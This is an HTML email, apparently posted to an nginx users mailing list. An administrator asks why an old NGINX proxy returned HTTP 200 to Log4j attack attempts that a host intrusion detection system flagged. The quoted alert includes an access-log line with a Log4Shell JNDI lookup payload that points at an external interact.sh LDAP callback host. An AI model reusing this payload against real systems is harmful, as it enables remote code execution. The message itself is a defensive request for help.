<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body style="word-wrap: break-word; -webkit-nbsp-mode: space; line-break: after-white-space;" class=""><br class="">
Dear Users,<div class=""><br class=""></div><div class="">I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform.</div><div class="">Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks.</div><div class="">In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs.</div><div class=""><br class=""></div><div class="">At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts.</div><div class="">Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was “HTTP/1.1 200” and I’m very worried about it.</div><div class="">Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j.</div><div class=""><br class=""></div><div class="">Could you please help me to understand the reason why the NGINX server answer was “HTTP/1.1 200”!?</div><div class=""><br class=""></div><div class="">You can see below the mail notification I received:</div><div class=""><br class=""></div><div class=""><br class=""><i class="">Attack Notification.<br class="">2021 Dec 28 20:45:59<br class=""><br class="">Received From: “hidden_NGINX_server_IP” >/var/log/nginx/access.log<br class="">Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."<br class="">Src IP: 166.137.252.110<br class="">Portion of the log(s):<br class=""><br class="">166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:<a href="ldap://%E2%80%9Chidden_server_IP" class="">ldap://“hidden_NGINX_server_IP</a>"<a href="ldap://193.204.199.214.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a" class="">.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a</a>} HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"</i></div><div class=""><br class=""></div><div class="">Thank you in advance,</div><div class="">Mauro </div></body></html>